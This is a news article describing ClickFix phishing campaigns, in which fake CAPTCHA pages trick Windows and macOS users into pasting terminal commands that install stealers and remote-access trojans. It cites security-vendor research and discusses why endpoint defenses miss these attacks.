Ripple effect: With the holiday travel season approaching – a period that typically brings a surge in booking-related communications – the likelihood of renewed phishing attempts remains high. Microsoft and other vendors have updated their endpoint protection tools to detect known ClickFix command patterns, but these defenses remain largely reactive. As long as social-engineering lures appear credible and require no file downloads, preventing infection will continue to depend primarily on user vigilance.
A year of escalating social-engineering attacks has produced one of the most efficient infection chains observed to date. Known as ClickFix, this method requires only that a user follow a brief set of instructions (typically copying and pasting a single line of text into a system terminal). Once the command executes, the user's machine – Mac or PC – contacts a remote server controlled by the attackers, downloads malware, and executes it silently. No visible file transfer, pop-up, or security alert interrupts the process.
ClickFix campaigns exploit the human tendency to trust familiar sources and to underestimate the risks of executing a text command. Victims often encounter the malicious prompt after clicking a realistic-looking link sent from a compromised hotel or booking account, or after landing on a poisoned search result.
The page typically displays a CAPTCHA or similar verification, appearing as a Cloudflare human check. Visitors are instructed to copy a short string into a terminal, an action that seems harmless but bypasses nearly every modern endpoint defense.
Once executed, the string triggers a remote script that silently fetches and installs malicious payloads. CrowdStrike researchers identified one such campaign targeting macOS devices with a Mach-O executable. Analysis revealed that the sample deployed a credential-stealer known as Shamos, alongside components that enlisted infected hosts into botnets and modified macOS settings to maintain persistence across reboots. The attack exploited Apple's Gatekeeper framework – designed to verify app integrity – by leveraging native command-line calls to make the installation appear legitimate.
CrowdStrike noted that the appeal for eCrime actors lies in the combination of precise social engineering and inherent system trust. Because the commands originate from within the operating system environment itself, rather than from an external installer, many endpoint protections fail to detect them.
This approach exemplifies the "living off the land" principle, commonly known among defenders as LOLbin attacks. It relies solely on built-in utilities such as PowerShell on Windows or Bash on macOS to carry out malicious activity. By avoiding the creation of new binaries on disk, these attacks evade signature-based detection almost entirely.
Researchers at Sekoia observed similar campaigns targeting Windows users via compromised hospitality accounts. In that variant, attackers took over genuine Booking.com or hotel management dashboards and used them to message upcoming guests with believable reservation details.
Recipients were then directed to counterfeit CAPTCHA pages that were indistinguishable from legitimate content delivery network checks. Copying the displayed text string into a Windows terminal caused the machine to be infected with a remote-access Trojan known as PureRAT.
For victims, the credibility of the communication proved decisive. The requests came from accounts already recognized as legitimate by their systems, lowering suspicion and boosting compliance. Once infected, systems could be leveraged to harvest saved passwords, cryptocurrency wallet credentials, or authentication tokens used in corporate environments.
Further research from Push Security revealed that newer ClickFix variants detect the operating system before delivering their payload. The same malicious webpage can serve a Windows binary or a macOS Mach-O executable depending on the visitor's environment.
Microsoft's investigation confirmed the use of adaptive scripts designed to exploit cross-platform LOLbin methods, emphasizing that these sequences execute fully within browser sandboxes and terminal shells. Because most antivirus solutions monitor file activity rather than in-memory command execution, these scripts often evade initial containment.
Attackers also encode command payloads using Base64, a standard obfuscation layer that conceals the actual code from human view while remaining readable to the system after decoding. When pasted from the browser into the terminal, the encoded command grants the malicious server remote command execution rights without additional clicks or permissions.
ClickFix exemplifies a broader evolution in social engineering, where technical barriers are replaced by behavioral manipulation. The deception relies less on exploiting unpatched software vulnerabilities and more on exploiting user trust and habits. Many users have learned to avoid dubious links, yet far fewer question instructions involving local system utilities. The result is a threat vector that outpaces public awareness and renders many conventional defenses ineffective.
Hackers found a way to weaponize CAPTCHA pages, and it's incredibly effective
